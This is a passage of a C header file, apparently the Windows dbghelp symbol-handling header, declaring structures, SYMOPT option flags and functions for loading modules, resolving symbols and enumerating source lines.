DWORD SizeOfStruct; // set to sizeof(IMAGEHLP_DEFERRED_SYMBOL_LOADW64)
DWORD64 BaseOfImage; // base load address of module
DWORD CheckSum; // checksum from the pe header
DWORD TimeDateStamp; // date/time stamp from pe header
WCHAR FileName[MAX_PATH + 1]; // symbols file or image name
BOOLEAN Reparse; // load failure reparse
HANDLE hFile; // file handle, if passed
DWORD Flags; //
} IMAGEHLP_DEFERRED_SYMBOL_LOADW64, *PIMAGEHLP_DEFERRED_SYMBOL_LOADW64;
#define DSLFLAG_MISMATCHED_PDB 0x1
#define DSLFLAG_MISMATCHED_DBG 0x2
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define IMAGEHLP_DEFERRED_SYMBOL_LOAD IMAGEHLP_DEFERRED_SYMBOL_LOAD64
#define PIMAGEHLP_DEFERRED_SYMBOL_LOAD PIMAGEHLP_DEFERRED_SYMBOL_LOAD64
#else
typedef struct _IMAGEHLP_DEFERRED_SYMBOL_LOAD {
DWORD SizeOfStruct; // set to sizeof(IMAGEHLP_DEFERRED_SYMBOL_LOAD)
DWORD BaseOfImage; // base load address of module
DWORD CheckSum; // checksum from the pe header
DWORD TimeDateStamp; // date/time stamp from pe header
CHAR FileName[MAX_PATH]; // symbols file or image name
BOOLEAN Reparse; // load failure reparse
HANDLE hFile; // file handle, if passed
} IMAGEHLP_DEFERRED_SYMBOL_LOAD, *PIMAGEHLP_DEFERRED_SYMBOL_LOAD;
#endif
typedef struct _IMAGEHLP_DUPLICATE_SYMBOL64 {
DWORD SizeOfStruct; // set to sizeof(IMAGEHLP_DUPLICATE_SYMBOL64)
DWORD NumberOfDups; // number of duplicates in the Symbol array
PIMAGEHLP_SYMBOL64 Symbol; // array of duplicate symbols
DWORD SelectedSymbol; // symbol selected (-1 to start)
} IMAGEHLP_DUPLICATE_SYMBOL64, *PIMAGEHLP_DUPLICATE_SYMBOL64;
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define IMAGEHLP_DUPLICATE_SYMBOL IMAGEHLP_DUPLICATE_SYMBOL64
#define PIMAGEHLP_DUPLICATE_SYMBOL PIMAGEHLP_DUPLICATE_SYMBOL64
#else
typedef struct _IMAGEHLP_DUPLICATE_SYMBOL {
DWORD SizeOfStruct; // set to sizeof(IMAGEHLP_DUPLICATE_SYMBOL)
DWORD NumberOfDups; // number of duplicates in the Symbol array
PIMAGEHLP_SYMBOL Symbol; // array of duplicate symbols
DWORD SelectedSymbol; // symbol selected (-1 to start)
} IMAGEHLP_DUPLICATE_SYMBOL, *PIMAGEHLP_DUPLICATE_SYMBOL;
#endif
// If dbghelp ever needs to display graphical UI, it will use this as the parent window.
BOOL
IMAGEAPI
SymSetParentWindow(
__in HWND hwnd
);
PCHAR
IMAGEAPI
SymSetHomeDirectory(
__in_opt HANDLE hProcess,
__in_opt PCSTR dir
);
PWSTR
IMAGEAPI
SymSetHomeDirectoryW(
__in_opt HANDLE hProcess,
__in_opt PCWSTR dir
);
PCHAR
IMAGEAPI
SymGetHomeDirectory(
__in DWORD type,
__out_ecount(size) PSTR dir,
__in size_t size
);
PWSTR
IMAGEAPI
SymGetHomeDirectoryW(
__in DWORD type,
__out_ecount(size) PWSTR dir,
__in size_t size
);
typedef enum {
hdBase = 0, // root directory for dbghelp
hdSym, // where symbols are stored
hdSrc, // where source is stored
hdMax // end marker
} DBG_HD_ENUM;
typedef struct _OMAP {
ULONG rva;
ULONG rvaTo;
} OMAP, *POMAP;
BOOL
IMAGEAPI
SymGetOmaps(
__in HANDLE hProcess,
__in DWORD64 BaseOfDll,
__out POMAP *OmapTo,
__out PDWORD64 cOmapTo,
__out POMAP *OmapFrom,
__out PDWORD64 cOmapFrom
);
//
// options that are set/returned by SymSetOptions() & SymGetOptions()
// these are used as a mask
//
#define SYMOPT_CASE_INSENSITIVE 0x00000001
#define SYMOPT_UNDNAME 0x00000002
#define SYMOPT_DEFERRED_LOADS 0x00000004
#define SYMOPT_NO_CPP 0x00000008
#define SYMOPT_LOAD_LINES 0x00000010
#define SYMOPT_OMAP_FIND_NEAREST 0x00000020
#define SYMOPT_LOAD_ANYTHING 0x00000040
#define SYMOPT_IGNORE_CVREC 0x00000080
#define SYMOPT_NO_UNQUALIFIED_LOADS 0x00000100
#define SYMOPT_FAIL_CRITICAL_ERRORS 0x00000200
#define SYMOPT_EXACT_SYMBOLS 0x00000400
#define SYMOPT_ALLOW_ABSOLUTE_SYMBOLS 0x00000800
#define SYMOPT_IGNORE_NT_SYMPATH 0x00001000
#define SYMOPT_INCLUDE_32BIT_MODULES 0x00002000
#define SYMOPT_PUBLICS_ONLY 0x00004000
#define SYMOPT_NO_PUBLICS 0x00008000
#define SYMOPT_AUTO_PUBLICS 0x00010000
#define SYMOPT_NO_IMAGE_SEARCH 0x00020000
#define SYMOPT_SECURE 0x00040000
#define SYMOPT_NO_PROMPTS 0x00080000
#define SYMOPT_OVERWRITE 0x00100000
#define SYMOPT_IGNORE_IMAGEDIR 0x00200000
#define SYMOPT_FLAT_DIRECTORY 0x00400000
#define SYMOPT_FAVOR_COMPRESSED 0x00800000
#define SYMOPT_ALLOW_ZERO_ADDRESS 0x01000000
#define SYMOPT_DISABLE_SYMSRV_AUTODETECT 0x02000000
#define SYMOPT_DEBUG 0x80000000
DWORD
IMAGEAPI
SymSetOptions(
__in DWORD SymOptions
);
DWORD
IMAGEAPI
SymGetOptions(
VOID
);
BOOL
IMAGEAPI
SymCleanup(
__in HANDLE hProcess
);
BOOL
IMAGEAPI
SymMatchString(
__in PCSTR string,
__in PCSTR expression,
__in BOOL fCase
);
BOOL
IMAGEAPI
SymMatchStringA(
__in PCSTR string,
__in PCSTR expression,
__in BOOL fCase
);
BOOL
IMAGEAPI
SymMatchStringW(
__in PCWSTR string,
__in PCWSTR expression,
__in BOOL fCase
);
typedef BOOL
(CALLBACK *PSYM_ENUMSOURCEFILES_CALLBACK)(
__in PSOURCEFILE pSourceFile,
__in_opt PVOID UserContext
);
// for backwards compatibility - don't use this
#define PSYM_ENUMSOURCFILES_CALLBACK PSYM_ENUMSOURCEFILES_CALLBACK
BOOL
IMAGEAPI
SymEnumSourceFiles(
__in HANDLE hProcess,
__in ULONG64 ModBase,
__in_opt PCSTR Mask,
__in PSYM_ENUMSOURCEFILES_CALLBACK cbSrcFiles,
__in_opt PVOID UserContext
);
typedef BOOL
(CALLBACK *PSYM_ENUMSOURCEFILES_CALLBACKW)(
__in PSOURCEFILEW pSourceFile,
__in_opt PVOID UserContext
);
BOOL
IMAGEAPI
SymEnumSourceFilesW(
__in HANDLE hProcess,
__in ULONG64 ModBase,
__in_opt PCWSTR Mask,
__in PSYM_ENUMSOURCEFILES_CALLBACKW cbSrcFiles,
__in_opt PVOID UserContext
);
BOOL
IMAGEAPI
SymEnumerateModules64(
__in HANDLE hProcess,
__in PSYM_ENUMMODULES_CALLBACK64 EnumModulesCallback,
__in_opt PVOID UserContext
);
BOOL
IMAGEAPI
SymEnumerateModulesW64(
__in HANDLE hProcess,
__in PSYM_ENUMMODULES_CALLBACKW64 EnumModulesCallback,
__in_opt PVOID UserContext
);
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define SymEnumerateModules SymEnumerateModules64
#else
BOOL
IMAGEAPI
SymEnumerateModules(
__in HANDLE hProcess,
__in PSYM_ENUMMODULES_CALLBACK EnumModulesCallback,
__in_opt PVOID UserContext
);
#endif
BOOL
IMAGEAPI
EnumerateLoadedModulesEx(
__in HANDLE hProcess,
__in PENUMLOADED_MODULES_CALLBACK64 EnumLoadedModulesCallback,
__in_opt PVOID UserContext
);
BOOL
IMAGEAPI
EnumerateLoadedModulesExW(
__in HANDLE hProcess,
__in PENUMLOADED_MODULES_CALLBACKW64 EnumLoadedModulesCallback,
__in_opt PVOID UserContext
);
BOOL
IMAGEAPI
EnumerateLoadedModules64(
__in HANDLE hProcess,
__in PENUMLOADED_MODULES_CALLBACK64 EnumLoadedModulesCallback,
__in_opt PVOID UserContext
);
BOOL
IMAGEAPI
EnumerateLoadedModulesW64(
__in HANDLE hProcess,
__in PENUMLOADED_MODULES_CALLBACKW64 EnumLoadedModulesCallback,
__in_opt PVOID UserContext
);
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define EnumerateLoadedModules EnumerateLoadedModules64
#else
BOOL
IMAGEAPI
EnumerateLoadedModules(
__in HANDLE hProcess,
__in PENUMLOADED_MODULES_CALLBACK EnumLoadedModulesCallback,
__in_opt PVOID UserContext
);
#endif
PVOID
IMAGEAPI
SymFunctionTableAccess64(
__in HANDLE hProcess,
__in DWORD64 AddrBase
);
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define SymFunctionTableAccess SymFunctionTableAccess64
#else
PVOID
IMAGEAPI
SymFunctionTableAccess(
__in HANDLE hProcess,
__in DWORD AddrBase
);
#endif
BOOL
IMAGEAPI
SymGetUnwindInfo(
__in HANDLE hProcess,
__in DWORD64 Address,
__out_bcount_opt(*Size) PVOID Buffer,
__inout PULONG Size
);
BOOL
IMAGEAPI
SymGetModuleInfo64(
__in HANDLE hProcess,
__in DWORD64 qwAddr,
__out PIMAGEHLP_MODULE64 ModuleInfo
);
BOOL
IMAGEAPI
SymGetModuleInfoW64(
__in HANDLE hProcess,
__in DWORD64 qwAddr,
__out PIMAGEHLP_MODULEW64 ModuleInfo
);
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define SymGetModuleInfo SymGetModuleInfo64
#define SymGetModuleInfoW SymGetModuleInfoW64
#else
BOOL
IMAGEAPI
SymGetModuleInfo(
__in HANDLE hProcess,
__in DWORD dwAddr,
__out PIMAGEHLP_MODULE ModuleInfo
);
BOOL
IMAGEAPI
SymGetModuleInfoW(
__in HANDLE hProcess,
__in DWORD dwAddr,
__out PIMAGEHLP_MODULEW ModuleInfo
);
#endif
DWORD64
IMAGEAPI
SymGetModuleBase64(
__in HANDLE hProcess,
__in DWORD64 qwAddr
);
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define SymGetModuleBase SymGetModuleBase64
#else
DWORD
IMAGEAPI
SymGetModuleBase(
__in HANDLE hProcess,
__in DWORD dwAddr
);
#endif
typedef struct _SRCCODEINFO {
DWORD SizeOfStruct; // set to sizeof(SRCCODEINFO)
PVOID Key; // not used
DWORD64 ModBase; // base address of module this applies to
CHAR Obj[MAX_PATH + 1]; // the object file within the module
CHAR FileName[MAX_PATH + 1]; // full filename
DWORD LineNumber; // line number in file
DWORD64 Address; // first instruction of line
} SRCCODEINFO, *PSRCCODEINFO;
typedef struct _SRCCODEINFOW {
DWORD SizeOfStruct; // set to sizeof(SRCCODEINFO)
PVOID Key; // not used
DWORD64 ModBase; // base address of module this applies to
WCHAR Obj[MAX_PATH + 1]; // the object file within the module
WCHAR FileName[MAX_PATH + 1]; // full filename
DWORD LineNumber; // line number in file
DWORD64 Address; // first instruction of line
} SRCCODEINFOW, *PSRCCODEINFOW;
typedef BOOL
(CALLBACK *PSYM_ENUMLINES_CALLBACK)(
__in PSRCCODEINFO LineInfo,
__in_opt PVOID UserContext
);
BOOL
IMAGEAPI
SymEnumLines(
__in HANDLE hProcess,
__in ULONG64 Base,
__in_opt PCSTR Obj,
__in_opt PCSTR File,
__in PSYM_ENUMLINES_CALLBACK EnumLinesCallback,
__in_opt PVOID UserContext
);
typedef BOOL
(CALLBACK *PSYM_ENUMLINES_CALLBACKW)(
__in PSRCCODEINFOW LineInfo,
__in_opt PVOID UserContext
);
BOOL
IMAGEAPI
SymEnumLinesW(
__in HANDLE hProcess,
__in ULONG64 Base,
__in_opt PCWSTR Obj,
__in_opt PCWSTR File,
__in PSYM_ENUMLINES_CALLBACKW EnumLinesCallback,
__in_opt PVOID UserContext
);
BOOL
IMAGEAPI
SymGetLineFromAddr64(
__in HANDLE hProcess,
__in DWORD64 qwAddr,
__out PDWORD pdwDisplacement,
__out PIMAGEHLP_LINE64 Line64
);
BOOL
IMAGEAPI
SymGetLineFromAddrW64(
__in HANDLE hProcess,
__in DWORD64 dwAddr,
__out PDWORD pdwDisplacement,
__out PIMAGEHLP_LINEW64 Line
);
BOOL
IMAGEAPI
SymEnumSourceLines(
__in HANDLE hProcess,
__in ULONG64 Base,
__in_opt PCSTR Obj,
__in_opt PCSTR File,
__in_opt DWORD Line,
__in DWORD Flags,
__in PSYM_ENUMLINES_CALLBACK EnumLinesCallback,
__in_opt PVOID UserContext
);
BOOL
IMAGEAPI
SymEnumSourceLinesW(
__in HANDLE hProcess,
__in ULONG64 Base,
__in_opt PCWSTR Obj,
__in_opt PCWSTR File,
__in_opt DWORD Line,
__in DWORD Flags,
__in PSYM_ENUMLINES_CALLBACKW EnumLinesCallback,
__in_opt PVOID UserContext
);
// flags for SymEnumSourceLines
#define ESLFLAG_FULLPATH 0x1
#define ESLFLAG_NEAREST 0x2
#define ESLFLAG_PREV 0x4
#define ESLFLAG_NEXT 0x8
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define SymGetLineFromAddr SymGetLineFromAddr64
#define SymGetLineFromAddrW SymGetLineFromAddrW64
#else
BOOL
IMAGEAPI
SymGetLineFromAddr(
__in HANDLE hProcess,
__in DWORD dwAddr,
__out PDWORD pdwDisplacement,
__out PIMAGEHLP_LINE Line
);
BOOL
IMAGEAPI
SymGetLineFromAddrW(
__in HANDLE hProcess,
__in DWORD dwAddr,
__out PDWORD pdwDisplacement,
__out PIMAGEHLP_LINEW Line
);
#endif
BOOL
IMAGEAPI
SymGetLineFromName64(
__in HANDLE hProcess,
__in_opt PCSTR ModuleName,
__in_opt PCSTR FileName,
__in DWORD dwLineNumber,
__out PLONG plDisplacement,
__inout PIMAGEHLP_LINE64 Line
);
BOOL
IMAGEAPI
SymGetLineFromNameW64(
__in HANDLE hProcess,
__in_opt PCWSTR ModuleName,
__in_opt PCWSTR FileName,
__in DWORD dwLineNumber,
__out PLONG plDisplacement,
__inout PIMAGEHLP_LINEW64 Line
);
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define SymGetLineFromName SymGetLineFromName64
#else
BOOL
IMAGEAPI
SymGetLineFromName(
__in HANDLE hProcess,
__in_opt PCSTR ModuleName,
__in_opt PCSTR FileName,
__in DWORD dwLineNumber,
__out PLONG plDisplacement,
__inout PIMAGEHLP_LINE Line
);
#endif
BOOL
IMAGEAPI
SymGetLineNext64(
__in HANDLE hProcess,
__inout PIMAGEHLP_LINE64 Line
);
BOOL
IMAGEAPI
SymGetLineNextW64(
__in HANDLE hProcess,
__inout PIMAGEHLP_LINEW64 Line
);
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define SymGetLineNext SymGetLineNext64
#else
BOOL
IMAGEAPI
SymGetLineNext(
__in HANDLE hProcess,
__inout PIMAGEHLP_LINE Line
);
BOOL
IMAGEAPI
SymGetLineNextW(
__in HANDLE hProcess,
__inout PIMAGEHLP_LINEW Line
);
#endif
BOOL
IMAGEAPI
SymGetLinePrev64(
__in HANDLE hProcess,
__inout PIMAGEHLP_LINE64 Line
);
BOOL
IMAGEAPI
SymGetLinePrevW64(
__in HANDLE hProcess,
__inout PIMAGEHLP_LINEW64 Line
);
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define SymGetLinePrev SymGetLinePrev64
#else
BOOL
IMAGEAPI
SymGetLinePrev(
__in HANDLE hProcess,
__inout PIMAGEHLP_LINE Line
);
BOOL
IMAGEAPI
SymGetLinePrevW(
__in HANDLE hProcess,
__inout PIMAGEHLP_LINEW Line
);
#endif
ULONG
IMAGEAPI
SymGetFileLineOffsets64(
__in HANDLE hProcess,
__in_opt PCSTR ModuleName,
__in PCSTR FileName,
__out_ecount(BufferLines) PDWORD64 Buffer,
__in ULONG BufferLines
);
BOOL
IMAGEAPI
SymMatchFileName(
__in PCSTR FileName,
__in PCSTR Match,
__deref_opt_out PSTR *FileNameStop,
__deref_opt_out PSTR *MatchStop
);
BOOL
IMAGEAPI
SymMatchFileNameW(
__in PCWSTR FileName,
__in PCWSTR Match,
__deref_opt_out PWSTR *FileNameStop,
__deref_opt_out PWSTR *MatchStop
);
BOOL
IMAGEAPI
SymGetSourceFile(
__in HANDLE hProcess,
__in ULONG64 Base,
__in_opt PCSTR Params,
__in PCSTR FileSpec,
__out_ecount(Size) PSTR FilePath,
__in DWORD Size
);
BOOL
IMAGEAPI
SymGetSourceFileW(
__in HANDLE hProcess,
__in ULONG64 Base,
__in_opt PCWSTR Params,
__in PCWSTR FileSpec,
__out_ecount(Size) PWSTR FilePath,
__in DWORD Size
);
BOOL
IMAGEAPI
SymGetSourceFileToken(
__in HANDLE hProcess,
__in ULONG64 Base,
__in PCSTR FileSpec,
__deref_out PVOID *Token,
__out DWORD *Size
);
BOOL
IMAGEAPI
SymGetSourceFileTokenW(
__in HANDLE hProcess,
__in ULONG64 Base,
__in PCWSTR FileSpec,
__deref_out PVOID *Token,
__out DWORD *Size
);
BOOL
IMAGEAPI
SymGetSourceFileFromToken(
__in HANDLE hProcess,
__in PVOID Token,
__in_opt PCSTR Params,
__out_ecount(Size) PSTR FilePath,
__in DWORD Size
);
BOOL
IMAGEAPI
SymGetSourceFileFromTokenW(
__in HANDLE hProcess,
__in PVOID Token,
__in_opt PCWSTR Params,
__out_ecount(Size) PWSTR FilePath,
__in DWORD Size
);
BOOL
IMAGEAPI
SymGetSourceVarFromToken(
__in HANDLE hProcess,
__in PVOID Token,
__in_opt PCSTR Params,
__in PCSTR VarName,
__out_ecount(Size) PSTR Value,
__in DWORD Size
);
BOOL
IMAGEAPI
SymGetSourceVarFromTokenW(
__in HANDLE hProcess,
__in PVOID Token,
__in_opt PCWSTR Params,
__in PCWSTR VarName,
__out_ecount(Size) PWSTR Value,
__in DWORD Size
);
typedef BOOL (CALLBACK *PENUMSOURCEFILETOKENSCALLBACK)(__in PVOID token, __in size_t size);
BOOL
IMAGEAPI
SymEnumSourceFileTokens(
__in HANDLE hProcess,
__in ULONG64 Base,
__in PENUMSOURCEFILETOKENSCALLBACK Callback
);
BOOL
IMAGEAPI
SymInitialize(
__in HANDLE hProcess,
__in_opt PCSTR UserSearchPath,
__in BOOL fInvadeProcess
);
BOOL
IMAGEAPI
SymInitializeW(
__in HANDLE hProcess,
__in_opt PCWSTR UserSearchPath,
__in BOOL fInvadeProcess
);
BOOL
IMAGEAPI
SymGetSearchPath(
__in HANDLE hProcess,
__out_ecount(SearchPathLength) PSTR SearchPath,
__in DWORD SearchPathLength
);
BOOL
IMAGEAPI
SymGetSearchPathW(
__in HANDLE hProcess,
__out_ecount(SearchPathLength) PWSTR SearchPath,
__in DWORD SearchPathLength
);
BOOL
IMAGEAPI
SymSetSearchPath(
__in HANDLE hProcess,
__in_opt PCSTR SearchPath
);
BOOL
IMAGEAPI
SymSetSearchPathW(
__in HANDLE hProcess,
__in_opt PCWSTR SearchPath
);
#define SLMFLAG_VIRTUAL 0x1
#define SLMFLAG_ALT_INDEX 0x2
#define SLMFLAG_NO_SYMBOLS 0x4
DWORD64
IMAGEAPI
SymLoadModuleEx(
__in HANDLE hProcess,
__in_opt HANDLE hFile,
__in_opt PCSTR ImageName,
__in_opt PCSTR ModuleName,
__in DWORD64 BaseOfDll,
__in DWORD DllSize,
__in_opt PMODLOAD_DATA Data,
__in_opt DWORD Flags
);
DWORD64
IMAGEAPI
SymLoadModuleExW(
__in HANDLE hProcess,
__in_opt HANDLE hFile,
__in_opt PCWSTR ImageName,
__in_opt PCWSTR ModuleName,
__in DWORD64 BaseOfDll,
__in DWORD DllSize,
__in_opt PMODLOAD_DATA Data,
__in_opt DWORD Flags
);
BOOL
IMAGEAPI
SymUnloadModule64(
__in HANDLE hProcess,
__in DWORD64 BaseOfDll
);
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define SymUnloadModule SymUnloadModule64
#else
BOOL
IMAGEAPI
SymUnloadModule(
__in HANDLE hProcess,
__in DWORD BaseOfDll
);
#endif
BOOL
IMAGEAPI
SymUnDName64(
__in PIMAGEHLP_SYMBOL64 sym, // Symbol to undecorate
__out_ecount(UnDecNameLength) PSTR UnDecName, // Buffer to store undecorated name in
__in DWORD UnDecNameLength // Size of the buffer
);
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define SymUnDName SymUnDName64
#else
BOOL
IMAGEAPI
SymUnDName(
__in PIMAGEHLP_SYMBOL sym, // Symbol to undecorate
__out_ecount(UnDecNameLength) PSTR UnDecName, // Buffer to store undecorated name in
__in DWORD UnDecNameLength // Size of the buffer
);
#endif
BOOL
IMAGEAPI
SymRegisterCallback64(
__in HANDLE hProcess,
__in PSYMBOL_REGISTERED_CALLBACK64 CallbackFunction,
__in ULONG64 UserContext
);
BOOL
IMAGEAPI
SymRegisterCallbackW64(
__in HANDLE hProcess,
__in PSYMBOL_REGISTERED_CALLBACK64 CallbackFunction,
__in ULONG64 UserContext
);
BOOL
IMAGEAPI
SymRegisterFunctionEntryCallback64(
__in HANDLE hProcess,
__in PSYMBOL_FUNCENTRY_CALLBACK64 CallbackFunction,
__in ULONG64 UserContext
);
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define SymRegisterCallback SymRegisterCallback64
#define SymRegisterFunctionEntryCallback SymRegisterFunctionEntryCallback64
#else
BOOL
IMAGEAPI
SymRegisterCallback(
__in HANDLE hProcess,
__in PSYMBOL_REGISTERED_CALLBACK CallbackFunction,
__in_opt PVOID UserContext
);
BOOL
IMAGEAPI
SymRegisterFunctionEntryCallback(
__in HANDLE hProcess,
__in PSYMBOL_FUNCENTRY_CALLBACK CallbackFunction,
__in_opt PVOID UserContext
);
#endif
typedef struct _IMAGEHLP_SYMBOL_SRC {
DWORD sizeofstruct;
DWORD type;
char file[MAX_PATH];
} IMAGEHLP_SYMBOL_SRC, *PIMAGEHLP_SYMBOL_SRC;
typedef struct _MODULE_TYPE_INFO { // AKA TYPTYP
USHORT dataLength;
USHORT leaf;
BYTE data[1];
} MODULE_TYPE_INFO, *PMODULE_TYPE_INFO;
typedef struct _SYMBOL_INFO {
ULONG SizeOfStruct;
ULONG TypeIndex; // Type Index of symbol
ULONG64 Reserved[2];
ULONG Index;
ULONG Size;
ULONG64 ModBase; // Base Address of module comtaining this symbol
ULONG Flags;
ULONG64 Value; // Value of symbol, ValuePresent should be 1
ULONG64 Address; // Address of symbol including base address of module
ULONG Register; // register holding value or pointer to value
ULONG Scope; // scope of the symbol
ULONG Tag; // pdb classification
ULONG NameLen; // Actual length of name
ULONG MaxNameLen;
CHAR Name[1]; // Name of symbol
} SYMBOL_INFO, *PSYMBOL_INFO;
typedef struct _SYMBOL_INFO_PACKAGE {
SYMBOL_INFO si;
CHAR name[MAX_SYM_NAME + 1];
} SYMBOL_INFO_PACKAGE, *PSYMBOL_INFO_PACKAGE;
typedef struct _SYMBOL_INFOW {
ULONG SizeOfStruct;
ULONG TypeIndex; // Type Index of symbol
ULONG64 Reserved[2];
ULONG Index;
ULONG Size;
ULONG64 ModBase; // Base Address of module comtaining this symbol
ULONG Flags;
ULONG64 Value; // Value of symbol, ValuePresent should be 1
ULONG64 Address; // Address of symbol including base address of module
ULONG Register; // register holding value or pointer to value
ULONG Scope; // scope of the symbol
ULONG Tag; // pdb classification
ULONG NameLen; // Actual length of name
ULONG MaxNameLen;
WCHAR Name[1]; // Name of symbol
} SYMBOL_INFOW, *PSYMBOL_INFOW;
typedef struct _SYMBOL_INFO_PACKAGEW {
SYMBOL_INFOW si;
WCHAR name[MAX_SYM_NAME + 1];
} SYMBOL_INFO_PACKAGEW, *PSYMBOL_INFO_PACKAGEW;
typedef struct _IMAGEHLP_STACK_FRAME
{
ULONG64 InstructionOffset;
ULONG64 ReturnOffset;
ULONG64 FrameOffset;
ULONG64 StackOffset;
ULONG64 BackingStoreOffset;
ULONG64 FuncTableEntry;
ULONG64 Params[4];
ULONG64 Reserved[5];
BOOL Virtual;
ULONG Reserved2;
} IMAGEHLP_STACK_FRAME, *PIMAGEHLP_STACK_FRAME;
typedef VOID IMAGEHLP_CONTEXT, *PIMAGEHLP_CONTEXT;
BOOL
IMAGEAPI
SymSetContext(
__in HANDLE hProcess,
__in PIMAGEHLP_STACK_FRAME StackFrame,
__in_opt PIMAGEHLP_CONTEXT Context
);
BOOL
IMAGEAPI
SymSetScopeFromAddr(
__in HANDLE hProcess,
__in ULONG64 Address
);
BOOL
IMAGEAPI
SymSetScopeFromIndex(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in DWORD Index
);
typedef BOOL
(CALLBACK *PSYM_ENUMPROCESSES_CALLBACK)(
__in HANDLE hProcess,
__in PVOID UserContext
);
BOOL
IMAGEAPI
SymEnumProcesses(
__in PSYM_ENUMPROCESSES_CALLBACK EnumProcessesCallback,
__in PVOID UserContext
);
BOOL
IMAGEAPI
SymFromAddr(
__in HANDLE hProcess,
__in DWORD64 Address,
__out_opt PDWORD64 Displacement,
__inout PSYMBOL_INFO Symbol
);
BOOL
IMAGEAPI
SymFromAddrW(
__in HANDLE hProcess,
__in DWORD64 Address,
__out_opt PDWORD64 Displacement,
__inout PSYMBOL_INFOW Symbol
);
BOOL
IMAGEAPI
SymFromToken(
__in HANDLE hProcess,
__in DWORD64 Base,
__in DWORD Token,
__inout PSYMBOL_INFO Symbol
);
BOOL
IMAGEAPI
SymFromTokenW(
__in HANDLE hProcess,
__in DWORD64 Base,
__in DWORD Token,
__inout PSYMBOL_INFOW Symbol
);
BOOL
IMAGEAPI
SymNext(
__in HANDLE hProcess,
__inout PSYMBOL_INFO si
);
BOOL
IMAGEAPI
SymNextW(
__in HANDLE hProcess,
__inout PSYMBOL_INFOW siw
);
BOOL
IMAGEAPI
SymPrev(
__in HANDLE hProcess,
__inout PSYMBOL_INFO si
);
BOOL
IMAGEAPI
SymPrevW(
__in HANDLE hProcess,
__inout PSYMBOL_INFOW siw
);
// While SymFromName will provide a symbol from a name,
// SymEnumSymbols can provide the same matching information
// for ALL symbols with a matching name, even regular
// expressions. That way you can search across modules
// and differentiate between identically named symbols.
BOOL
IMAGEAPI
SymFromName(
__in HANDLE hProcess,
__in PCSTR Name,
__inout PSYMBOL_INFO Symbol
);
BOOL
IMAGEAPI
SymFromNameW(
__in HANDLE hProcess,
__in PCWSTR Name,
__inout PSYMBOL_INFOW Symbol
);
typedef BOOL
(CALLBACK *PSYM_ENUMERATESYMBOLS_CALLBACK)(
__in PSYMBOL_INFO pSymInfo,
__in ULONG SymbolSize,
__in_opt PVOID UserContext
);
BOOL
IMAGEAPI
SymEnumSymbols(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in_opt PCSTR Mask,
__in PSYM_ENUMERATESYMBOLS_CALLBACK EnumSymbolsCallback,
__in_opt PVOID UserContext
);
typedef BOOL
(CALLBACK *PSYM_ENUMERATESYMBOLS_CALLBACKW)(
__in PSYMBOL_INFOW pSymInfo,
__in ULONG SymbolSize,
__in_opt PVOID UserContext
);
BOOL
IMAGEAPI
SymEnumSymbolsW(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in_opt PCWSTR Mask,
__in PSYM_ENUMERATESYMBOLS_CALLBACKW EnumSymbolsCallback,
__in_opt PVOID UserContext
);
BOOL
IMAGEAPI
SymEnumSymbolsForAddr(
__in HANDLE hProcess,
__in DWORD64 Address,
__in PSYM_ENUMERATESYMBOLS_CALLBACK EnumSymbolsCallback,
__in_opt PVOID UserContext
);
BOOL
IMAGEAPI
SymEnumSymbolsForAddrW(
__in HANDLE hProcess,
__in DWORD64 Address,
__in PSYM_ENUMERATESYMBOLS_CALLBACKW EnumSymbolsCallback,
__in_opt PVOID UserContext
);
#define SYMSEARCH_MASKOBJS 0x01 // used internally to implement other APIs
#define SYMSEARCH_RECURSE 0X02 // recurse scopes
#define SYMSEARCH_GLOBALSONLY 0X04 // search only for global symbols
#define SYMSEARCH_ALLITEMS 0X08 // search for everything in the pdb, not just normal scoped symbols
BOOL
IMAGEAPI
SymSearch(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in_opt DWORD Index,
__in_opt DWORD SymTag,
__in_opt PCSTR Mask,
__in_opt DWORD64 Address,
__in PSYM_ENUMERATESYMBOLS_CALLBACK EnumSymbolsCallback,
__in_opt PVOID UserContext,
__in DWORD Options
);
BOOL
IMAGEAPI
SymSearchW(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in_opt DWORD Index,
__in_opt DWORD SymTag,
__in_opt PCWSTR Mask,
__in_opt DWORD64 Address,
__in PSYM_ENUMERATESYMBOLS_CALLBACKW EnumSymbolsCallback,
__in_opt PVOID UserContext,
__in DWORD Options
);
BOOL
IMAGEAPI
SymGetScope(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in DWORD Index,
__inout PSYMBOL_INFO Symbol
);
BOOL
IMAGEAPI
SymGetScopeW(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in DWORD Index,
__inout PSYMBOL_INFOW Symbol
);
BOOL
IMAGEAPI
SymFromIndex(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in DWORD Index,
__inout PSYMBOL_INFO Symbol
);
BOOL
IMAGEAPI
SymFromIndexW(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in DWORD Index,
__inout PSYMBOL_INFOW Symbol
);
typedef enum _IMAGEHLP_SYMBOL_TYPE_INFO {
TI_GET_SYMTAG,
TI_GET_SYMNAME,
TI_GET_LENGTH,
TI_GET_TYPE,
TI_GET_TYPEID,
TI_GET_BASETYPE,
